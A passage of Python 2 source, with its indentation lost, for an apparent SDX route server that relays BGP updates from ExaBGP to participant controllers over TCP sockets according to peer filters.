def process_hello_message(self, id=None, peers_in=None, peers_out=None, ports=None, **data):
if not (id is not None and isinstance(ports, list) and
isinstance(peers_in, list) and isinstance(peers_out, list)):
logger.warn("hello message from %s is missing something: id: %s, ports: %s, peers_in: %s, peers_out: %s. Closing connection.", self.addr, id, ports, peers_in, peers_out)
return False
self.id = id = int(id)
self.peers_in = set(peers_in)
self.peers_out = set(peers_out)
with participantsLock:
logger.debug('Trace: PctrlClient.hello: portip2participant before: %s', portip2participant)
logger.debug('Trace: PctrlClient.hello: participants before: %s', participants)
for port in ports:
portip2participant[port] = id
participants[id] = self
logger.debug('Trace: PctrlClient.hello: portip2participant after: %s', portip2participant)
logger.debug('Trace: PctrlClient.hello: participants after: %s', participants)
create_sig()
return True
def process_bgp_message(self, announcement = None, **data):
if announcement:
bgpListener.send(announcement)
return True
def send(self, route):
logger.debug('Sending a route update to participant %d', self.id)
if route:
msg = json.dumps({'bgp': route, 'route_id': route['route_id']})
else:
msg = 'stop'
self.conn.send(struct.pack('H', len(msg) + 2) + msg)
class PctrlListener(object):
def __init__(self):
logger.info("Initializing the BGP PctrlListener")
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener.bind(config.ah_socket)
self.listener.listen(128)
self.run = True
def start(self):
logger.info("Starting the BGP PctrlListener")
while self.run:
try:
self.listener.settimeout(1)
(conn, addr) = self.listener.accept()
pc = PctrlClient(conn, addr)
t = Thread(target=pc.start)
with clientPoolLock:
logger.debug('Trace: PctrlListener.start: clientActivePool before: %s', clientActivePool)
logger.debug('Trace: PctrlListener.start: clientDeadPool before: %s', clientDeadPool)
clientActivePool[pc] = t
# while here, join dead threads.
while clientDeadPool:
clientDeadPool.pop().join()
logger.debug('Trace: PctrlListener.start: clientActivePool after: %s', clientActivePool)
logger.debug('Trace: PctrlListener.start: clientDeadPool after: %s', clientDeadPool)
t.start()
except socket.timeout:
pass
logger.info("listener socket close")
self.listener.close()
def stop(self):
logger.info("Stopping PctrlListener.")
self.run = False
class BGPListener(object):
def __init__(self, as_num):
logger.info('Initializing the BGPListener')
# Initialize XRS Server
self.server = Server(logger)
self.run = True
self.route_id = 0
self.start_time = 0
self.end_time = 0
self.as_num = int(as_num)
self.stop_counts = 0
def start(self):
logger.info("Starting the Server to handle incoming BGP Updates.")
self.server.start()
waiting = 0
while self.run:
# get BGP messages from ExaBGP via stdin in client.py,
# which is routed to server.py via port 6000,
# which is routed to here via receiver_queue.
try:
route = self.server.receiver_queue.get(True, 1)
except Queue.Empty:
if waiting == 0:
logger.debug("Waiting for BGP update...")
waiting = (waiting+1) % 30
continue
if self.start_time == 0:
self.start_time = time.time()
waiting = 0
logger.debug("\n BGPListener: Got original route from ExaBGP: %s\n", route)
route = json.loads(route)
if 'stop' in route:
logger.info("BGPListener: stop signal received from ExaBGP")
peers = participants.values()
for peer in peers:
peer.send([])
continue
self.route_id = route["route_id"]
# Received BGP route advertisement from ExaBGP
try:
advertise_ip = route['neighbor']['ip']
except KeyError:
continue
found = []
with participantsLock:
try:
advertise_id = portip2participant[advertise_ip]
peers_out = participants[advertise_id].peers_out
except KeyError:
continue
for id, peer in participants.iteritems():
# Apply the filtering logic
if id in peers_out and advertise_id in peer.peers_in:
found.append(peer)
for peer in found:
# Now send this route to participant `id`'s controller'
peer.send(route)
self.end_time = time.time()
self.server.stop()
def send(self, announcement):
self.end_time = time.time()
#self.server.sender_queue.put(announcement)
def stop(self):
logger.info("Stopping BGPListener.")
self.run = False
def parse_config(config_file):
"Parse the config file"
# loading config file
logger.debug("Begin parsing config...")
with open(config_file, 'r') as f:
config = json.load(f)
ah_socket = tuple(config["Route Server"]["AH_SOCKET"])
logger.debug("Done parsing config")
return Config(ah_socket)
def main():
global bgpListener, pctrlListener, config
parser = argparse.ArgumentParser()
parser.add_argument('as_num', help='the as number')
parser.add_argument('dir', help='the directory of the example')
args = parser.parse_args()
# locate config file
config_file = "../examples/" + args.dir + "sdx_global.cfg"
logger.info("Reading config file %s", config_file)
config = parse_config(config_file)
bgpListener = BGPListener(args.as_num)
bp_thread = Thread(target=bgpListener.start)
bp_thread.start()
pctrlListener = PctrlListener()
pp_thread = Thread(target=pctrlListener.start)
pp_thread.start()
create_sig()
while bp_thread.is_alive():
try:
time.sleep(5)
except KeyboardInterrupt:
bgpListener.stop()
bp_thread.join()
pctrlListener.stop()
pp_thread.join()
logger.info("route server exits.")
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.